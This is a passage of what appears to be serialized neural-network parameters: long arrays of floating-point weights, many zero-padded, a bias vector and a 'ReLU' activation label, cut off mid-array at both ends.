-0.1956, -0.4392, -0.2231, 0.454, -0.1261, -0.402, 0.5137, 0.03146, -2.082, 0.5254, -0.02193, -0.2098, 0.3408, 0.00945, -0.2524, -0.4038, -0.1312, 0.05234, -0.3901, 0.889], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.926, -0.012764, 0.331, -0.4568, 1.564, 0.9526, -0.1805, -2.426, -1.141, 0.5566, 0.02972, -0.5454, -3.031, -0.356, 0.1322, 0.09607, 0.3179, 1.313, 0.6685, -2.451, -0.6035, 1.202, 0.472, 0.738, -0.02481, 0.02548, -0.0571, -0.365, -0.414, -0.02122, -0.364, -1.15, 0.9946, 0.2673, 0.507, 0.422, 0.2001, -0.0454, -1.399, -0.2551, -0.9526, 0.363, 0.28, 0.06915, -0.1471, -0.663, 1.073, 1.05, 0.566, -0.3342], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04703, 0.02603, -0.00239, -0.03568, -0.02388, 0.005646, -0.0106, -0.02118, -0.00674, 0.00683, -0.003952, -0.0108, 0.02226, 0.04584, 0.0105, 0.006634, 0.02028, 0.0324, 0.005165, -0.0433, -0.02408, -0.04214, 0.01651, -0.01993, 0.03162, -0.01802, -0.02008, 0.0007777, -0.02756, -0.04553, 0.01808, 0.001119, -0.01596, -0.03278, -0.04626, -0.0155, -0.013336, 0.03586, -0.001703, -0.01313, -0.02757, -0.04437, -0.007835, 0.036, -0.001357, -0.04413, 0.0099, 0.02455, -0.00276, -0.006874], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.149, 0.008, -0.02437, 0.483, 0.609, -0.3862, -0.0078, 0.7017, -0.01432, -0.2876, 0.05936, -0.3264, 0.04892, 0.4016, -0.1901, 0.1309, 0.5825, 0.727, -0.273, 0.3362, -1.028, -0.01932, 0.01372, 0.0554, 0.03143, -0.04376, -1.058, 0.2069, 0.1626, -0.0656, -0.10864, 1.377, 0.0751, 0.08875, -0.184, -0.3333, 0.2479, 0.02844, -0.39, 0.3142, -0.4778, -0.1415, -0.7686, 0.015396, -0.0362, 0.05, 0.0951, -1.174, 0.415, 0.732], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6846, 0.02663, -0.02704, -0.4937, 0.08545, 0.1989, 1.145, 0.0208, 0.3176, -0.2205, -0.03482, -0.1149, 0.0336, 0.1625, 0.1633, -0.006622, -0.399, -0.396, -0.3774, -0.2327, 0.09436, 0.1912, 0.169, 0.02922, -0.03418, -0.03308, -0.02473, -0.955, 0.2656, 0.092, -0.0691, -0.1371, -0.0987, 0.3037, -0.2079, -0.2188, 0.1521, 0.03738, -5.273, 0.32, -0.01593, -0.419, -0.0451, 0.01979, 0.4487, -0.04437, 0.3372, -0.06476, -0.1864, 1.328]]
[-0.408486, 1.06875, -0.101351, 0.291739, 0.361906, -1.17598, -1.08494, -0.525396, -0.485121, -0.563451, -0.430958, -0.375102, -0.299369, -0.300263, -0.528058, -0.0620032, -0.65379, 0.730181, -0.849961, -0.0157298, -0.289808, 0.27894, 1.47078, 2.10793, -0.31017, -0.538444, -0.145919, 1.01049, -0.374156, -0.0527222, -0.14879, 0.255464, -0.772198, -1.76047, 0.0622966, 0.254439, -0.150744, -0.757264, -2.46425, -0.913194, -0.563058, -0.217101, 0.570546, -0.523408, -1.49997, -0.261921, -0.526109, -0.00598984, -0.464336, 0.114195, -0.4084, 1.068, -0.1014, 0.2917, 0.3618, -1.176, -1.085, -0.5254, -0.485, -0.5635, -0.431, -0.375, -0.2993, -0.3003, -0.528, -0.062, -0.654, 0.73, -0.85, -0.01573, -0.2898, 0.279, 1.471, 2.107, -0.31, -0.5386, -0.1459, 1.011, -0.3743, -0.05273, -0.1488, 0.2554, -0.772, -1.761, 0.0623, 0.2544, -0.1508, -0.7573, -2.465, -0.913, -0.563, -0.217, 0.5703, -0.5234, -1.5, -0.262, -0.526, -0.00599, -0.4644, 0.1142]
ReLU
[[-0.775044, -0.415395, -0.324942, 0.112048, -0.74317, -0.784722, -0.778083, -0.357055, -0.357092, -0.225596, 0.89654, -0.552908, -0.136944, -0.232227, -0.498618, 0.433755, 1.43314, -0.740146, -1.05938, -0.0229214, 0.335653, -0.593277, -0.374214, -2.31097, 0.292584, 1.00206, 0.150349, -1.89577, -0.138339, -0.487172, -0.685847, -2.05561, 0.518935, 0.305489, 0.171208, 0.0961368, 0.797444, -1.2447, -0.736054, 0.805096, -0.174525, -0.109511, -0.208033, -1.6955, -1.00053, -0.212945, -0.880842, 0.00288769, -0.0587614, 0.393332, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.289933, -0.0390589, -0.235392, -0.0341524, -0.101442, -0.0104391, -0.153227, 0.14617, 0.0203408, 0.0205047, -0.204445, 0.229674, -0.0964483, 0.0687688, 0.00506923, -0.189823, 0.259219, -0.271825, 0.01345, -0.0236374, -0.00100425, 0.070848, -0.0760077, -0.158165, 0.0834323, -0.00705742, -0.0295734, -0.0918318, -0.00783515, 0.0157236, -0.368545, 0.259276, 0.51233, 0.0470324, 0.0245031, 0.0139921, -0.249023, -0.141486, 0.0633367, 0.164842, -0.158553, 0.154392, -0.145494, -0.185129, -0.0243234, 0.546112, -0.0510707, 0.0289771, 0.0943521, 0.244394, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.099163, -0.0366602, 0.0755007, 0.446032, -0.179006, -0.0030297, 0.133774, -0.111621, 0.382412, 0.41951, -0.164855, -0.111633, 0.0140495, -0.163988, -0.273372, -0.0503863, -0.159384, -0.128305, -0.127405, 0.0283343, -0.0852565, -0.339762, -0.0101792, -0.0474959, -0.295914, -0.0423524, 0.0283382, -0.170574, -0.199672, -0.078606, -0.0304747, 0.141624, 0.115279, 0.0424489, -0.0896282, 0.00771229, -0.0468138, -0.293026, 0.0592837, 0.169743, -0.0259172, -0.134006, -0.0115559, 0.0412064, 0.0757857, -0.177031, -0.0125494, -0.0174408, 0.135628, 0.0385604, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.605937, -0.285093, 1.46327, -0.355091, 0.362924, 0.227066, -0.767363, -2.10343, -0.395873, 1.31398, -1.75569, 1.21543, 0.304692, 0.0679581, -0.433435, 1.42359, -0.496077, 0.176303, 0.137501, 0.00302901, -0.743782, -0.275058, 0.160956, 0.450417, 0.943343, 0.208146, -0.413542, 1.15751, -0.135771, -0.248231, 0.260131, -1.36444, -1.37311, 0.528376, 0.148232, 0.162377, 0.170921, -0.189102, -0.0934121, -0.0273202, 0.347112, 0.296986, 0.434758, 1.45867, 0.608835, -1.53797, 0.0230557, 0.040957, 0.03261, 0.362523, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.670455, 0.710898, 1.28744, -0.882045, 0.0258417, 0.903023, -0.5382, -0.174708, 0.208279, -0.29329, 0.518818, -0.622398, 0.409716, 1.54737, 1.27005, 0.16951, -1.90741, -1.46998, 0.0279246, 0.0450144, 0.355137, -0.0628051, -0.683266, 0.309326, -0.600533, -1.01948, 0.679086, -2.22737, 0.518847, 0.0882435, -0.920202, -2.5876, 1.18247, -0.226148, 0.361083, -1.85547, 0.691654, 0.365051, -0.537776, 0.160241, 0.0905421, -0.69779, 0.962715, 0.866893, 1.89278, -1.29419, 0.939011, -0.0133065, 0.755068, -0.0372955, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.121062, -0.112551, -0.331936, 0.0576856, -0.0952833, 0.0641034, -0.0380395, 0.069137, 0.0394384, 0.0432422, 0.177619, -0.323053, -0.0772591, 0.0112817, -0.0407238, 0.078279, 0.31725, -0.0402553, -0.132371, 0.0485819, 0.0520028, -0.089381, -0.121834, -0.220348, 0.172532, 0.0210572, -0.105575, -0.129419, 0.0310569, -0.0714138, 0.160757, 0.18827, 0.397979, 0.025908, -0.185127, 0.240188, 0.0424864, -0.166795, 0.0879923, 0.321831, -0.00452026, -0.0663753, -0.0543892, 0.0373707, 0.180538, 0.373327, -0.0775681, 0.0230342, -0.0941502, 0.207511, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.248874, 0.0982728, 0.0846956, 0.486966, 0.0546425, 0.213559, 0.0120736, 0.449745, -0.28653, -0.457988, -0.187885, -0.226453, 0.18666, 0.117949, -0.0120727, 0.25654, -0.173109, -0.134126, -0.0560314, -0.0045311, -0.192302, -0.0884756, 0.0402012, 0.0398664, 0.737175, -0.172223, -0.0684839, -0.00075194, 0.0852525, 0.212977, 0.370546, -0.365634, 0.322437, 0.188932, 0.159048, -0.106006, -0.0446813, -0.24157, 0.0156972, 0.0392898, 0.0576905, -0.0127836, -0.235329, -0.317162, -0.21647, -0.305702, 0.0441344, 0.0336897, -0.0722653, 0.124496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.393225, -0.205191, -0.35831, -0.18181, -0.208585, -0.265514, 0.338443, 0.387592, 0.803458, 0.0297769, 0.244932, -0.212447, -0.330273, -0.194288, 0.685385, -0.212339, 0.0726721, -0.052438, 0.0899994, -0.0200148, 0.181243, 0.936649, 0.0974104, -0.263275, -0.0655607, -0.256915, -0.0618897, -0.0968321, 0.303331, 0.0429135, -0.109106, 0.480513, 0.55293, 0.137135, 0.482449, -0.032718, 0.153575, -0.0165924, -0.223499, 0.709982, 0.0422823, -0.110095, -0.114181, 0.11054, -0.375481, 0.142812, -0.160258, -0.0212633, 0.134853, -0.406273, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0818828, -0.177643, -0.291979, 0.358953, -0.0206239, -0.154736, -0.0578907, 0.0736091, -0.116992, -0.371863, -0.272881, -0.361285, 0.108221, 0.18245, 0.252614, -0.233528, 0.357438, 0.19119, -0.149432, -0.0238803, 0.0650345, 0.419219, -0.0935929, -0.120685, 1.11962, 0.370422, -0.182359, 0.65889, 0.0998101, -0.143984, 0.268125, -0.289762, 0.531907, -0.148363, 0.177573, -0.130263, 0.0291982, -0.376395, -0.221834, -0.0800251, -0.495121, -0.0537386, -0.305319, 0.625073, -0.0209418, 0.150732, -0.156614, 0.0211654, -0.358304, 0.050066, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.194819, 0.372706, -0.136073, 0.115637, -0.564466, 0.457853, 0.2284, 0.615822, 0.420017, -0.400167, 2.25497, 0.387347, -1.02186, -0.0317851, -1.05273, 0.23534, -0.199973, 0.453475, 0.114129, -0.0307462, -0.0712554, 0.654712, 0.0197267, -1.11745, 0.278202, -0.0715725, 0.130393, 0.417971, -0.496835, -0.587662, 0.0472645, -0.234516, -0.0925567, -0.580341, 0.218873, 0.244211, 0.816749, -0.604895, -0.594381, -0.504349, -1.77115, -0.760193, 0.145655, -0.341681, -0.292623, 0.388744, 0.676587, 0.0216446, -0.0209792, -0.0632221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.657673, -0.236014, -0.478229, -0.0304675, -0.373831, 0.197733, 0.00821276, 0.471799, 0.700843, 0.130614, -1.41459, 0.0918417, -0.103947, 0.0448295, -0.142033, 0.404678, 0.522869, 0.662575, -0.356512, 0.0464266, 0.195922, 0.684416, -0.203029, -0.222214, 1.34309, -0.41915, -0.105085, -0.507511, 0.0591906, -0.0714123, -0.137054, 0.534257, 0.16111, -0.36477, -0.215097, 0.585106, -0.016371, -0.138725, 0.482136, -0.0488709, -0.617627, 0.162392, -0.186088, -0.121071, 0.982127, 0.279216, -0.0342331, -0.0428749, 0.373818, -0.410173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.510451, 0.0903219, 0.373484, 0.194804, -0.138909, 0.182357, 0.133604, -0.579168, 0.287305, -0.12749, 0.254668, -0.673831, 0.292064, -0.416716, -0.561937, 0.407125, -0.567616, 0.493629, 0.204314, 0.0356814, -0.310524, -0.205341, 0.141982, 0.290271, -0.809781, 0.244646, 0.199171, 0.616405, -0.416208, 0.247175, -0.126878, 0.0549306, -0.518508, -0.21013, -0.216053, -0.137394, 0.101024, 0.103484, -0.211573, -0.0333884, -0.00306798, -0.339154, 0.344033, 0.00627817, 0.592674, -0.71454, 0.0363575, -0.0182024, -0.187944, -0.123645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.656003, -0.381218, -0.0285268, -1.57473, 0.887882, -0.324637, -0.884505, 0.64765, -2.82155, -0.591421, 1.08632, 0.250452, 0.0602489, 0.57112, 1.09003, -0.512318, 0.244307, -1.52983, 0.2532, 0.00833969, -0.871244, -0.834247, 0.242425, -0.0196197, -1.34091, -0.550358, -0.49189, 0.0882809, 0.75398, 0.364376, -0.127734, -0.216948, -0.116729, -0.103958, 0.584057, -0.557886, 0.681637, 0.395944, -0.668885, -0.536029, 0.617283, 0.252462, 0.178879, 0.468078, -0.209306, 1.0143, 0.310979, -0.0385302, 0.363922, -1.35633, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0628853, 0.151351, 0.0876364, -0.498453, 0.415273, 0.11342, 0.0953064, 0.00653031, 0.722149, 0.573603, 1.10456, -0.383111, 0.026028, 0.795328, -0.666633, 0.350581, -0.14838, 0.0170301, 0.0693605, -0.00384607, -0.17077, -0.240819, 0.145452, -1.10345, 0.300824, -0.371266, 0.34543, 0.0428167, 0.0428564, 0.404053, -0.0965074, 1.08281, -0.66315, 0.170895, 0.337159, -0.871081, -0.0401024, -0.187738, -0.219213, 0.0567089, -0.0701377, -0.455001, -0.456851, 0.837982, 0.535647, 0.00896233, -1.25932, 0.0367693, 0.147398, -0.44351, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0234828, 0.027635, 0.0163625, -0.00758906, 0.0316789, -0.0541716, 0.00898624, -0.0354943, 0.020091, -0.024155, 0.0340372, -0.0431777, -0.0512662, 0.00738836, 0.0112524, -0.0246442, -0.044482, -0.0544778, 0.0528917, -0.0470315, -0.0334089, -0.0241598, -0.0587141, -0.03783, 0.015691, 0.0400717, -0.0479465, -0.0188539, 0.0346601, -0.0398029, 0.00291043, -0.00669336, 0.0306953, -0.0146713, -0.0421742, -0.0450507, -0.00561382, 0.00114165, -0.0149391, -0.00642788, -0.0305618, 0.0199839, 0.0348052, 0.0384791, -0.0352448, -0.0502785, -0.0405233, 0.0496328, 0.00656141, 0.00706524, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.560505, -1.06136, -1.0305, 4.17539, -1.20403, 1.19415, -0.460227, 0.602673, 2.45267, -0.425074, -0.864798, -0.617433, -0.518578, -1.73708, 0.825487, -0.314659, 1.7776, 0.19002, -0.874712, -0.00873546, 1.14952, 2.21113, -0.725265, -1.31452, 0.903581, 1.24322, -0.490874, -1.63952, -0.705805, -0.350019, 1.21628, 1.4807, 2.15898, 0.725125, -0.888909, 2.51391, -0.842818, -0.555289, 1.08218, 1.75632, -0.188991, -0.523448, -0.772194, 1.47146, 1.97701, 1.7165, -0.0332548, 0.0387848, -0.815259, 1.45621, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0662013, -0.283445, 0.244095, -0.0527514, 0.164633, -0.189482, 0.748146, -0.136407, 0.245438, 0.755481, -1.27957, -0.103408, 0.312589, -0.045441, 0.182315, -0.649753, -0.0480084, 0.377751, 0.0514055, 0.0168861, -0.0744912, -0.39922, 0.0566199, 0.588136, 0.0568239, 0.597862, -0.832633, -0.229754, -0.114481, 0.376802, 0.0425195, -0.141544, 0.310787, 0.631996, -0.286965, 0.0869064, -0.0304457, -0.168996, -0.0920756, 0.148827, 0.504422, 0.434531, -0.900321, 0.190626, -0.30998, -0.0764852, -0.284561, -0.050023, 0.34194, 0.0499636, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.45275, -0.431664, -2.44945, -0.0537688, -1.71025, 0.75596, -1.34352, 1.27299, -0.00461038, -0.880558, -1.09352, 0.259272, -0.150566, 0.410594, -0.150891, -0.00684248, -0.803483, 1.28966, -0.45007, -0.016099, 0.579515, 1.0705, -0.557186, -0.410094, 0.963538, -0.471047, 0.703595, -0.613629, -0.258537, 0.132904, -0.211851, -3.34136, -1.59025, -0.3485, 0.530203, 0.762842, -0.103041, -3.52818, 0.28148, -0.786444, -0.136872, -1.04739, 0.946986, -0.846495, 0.776997, -0.0703112, 0.324285, -0.0224274, -0.611006, -0.333065, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.197084, -0.751798, 0.0752054, -0.000303508, 0.0947408, -0.225901, 0.0362113, -0.0967704, 0.161913, -0.730865, -0.986402, 0.24, 0.114256, -0.793848, 0.404072, 0.047984, 0.460459, 0.657656, -0.405925, -0.0415795, -0.230993, 0.522012, -0.241278, 0.191419, -0.679629, -0.39221, -0.0519757, -1.98617, -0.478738, 0.137538, 0.22764, 0.178041, 0.338771, -0.0763771, 0.306951, 0.345456, 0.502152, -0.100751, -0.376282, -0.14809, -1.08919, 0.0600825, -0.855034, 0.654758, 0.00413072, 0.523704, -0.345701, -0.0157347, 0.293174, 0.06847, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0606654, 0.0661857, -0.12843, -0.0477622, 0.200595, -0.167225, 0.179903, -0.125281, -0.0678608, -0.009607, -0.290273, 0.1198, -0.0915363, 0.0489478, -0.0857171, 0.0579715, 0.0473607, -0.10835, 0.0271226, -0.0242339, 0.011779, 0.295349, -0.0438312, -0.149945, -0.162454, 0.427161, -0.161175, -0.330562, -0.094305, -0.112317, 0.103801, 0.529166, 0.355691, -0.369037, -0.244132, -0.38939, -0.376939, -0.0276659, -0.310553, -0.363724, 0.226993, -0.0867482, 0.0448723, 0.0108905, 0.18924, -0.236489, -0.139798, -0.0384602, 0.0959229, 0.158214, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.238801, -0.491399, -0.354474, -0.397221, -0.277335, 0.21212, 0.63737, 0.717802, 0.368699, -0.833915, 0.680279, -0.162258, -0.427654, -0.22883, -0.420752, -0.129448, -0.661415, 0.906932, -0.733522, -0.00825282, 0.118991, -0.793334, -0.217769, -1.36196, -0.867316, 0.0803535, 0.117286, 0.770928, 0.380504, -0.422049, -0.939379, 0.0179382, -0.233438, -0.229743, 0.133693, 1.03164, 0.129585, -0.0228044, -0.236394, 0.268923, -0.436232, -0.244745, 0.293481, 0.0680715, 0.35272, 0.00364194, 0.312645, 0.0409737, 0.309289, -0.247261, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.21575, 0.449087, 0.249439, 0.309514, -0.154501, 0.503957, -0.322033, 0.63437, 0.393685, -0.34695, 2.03183, -0.0432027, -0.226656, -0.539902, 1.06543, -1.76505, -0.201859, 0.197859, -0.0350888, 0.0108464, -0.214659, 1.75444, -0.300968, -0.310804, 0.358077, -0.706662, -1.92034, -0.43951, 0.20232, -0.237194, -0.377917, 1.43554, 0.173703, -1.02989, 2.04454, 0.27464, -0.310126, 0.351944, -0.53682, -0.485225, 0.788112, -0.00906389, 0.973464, -0.259068, 0.491009, 0.169289, -0.518636, 0.0455357, 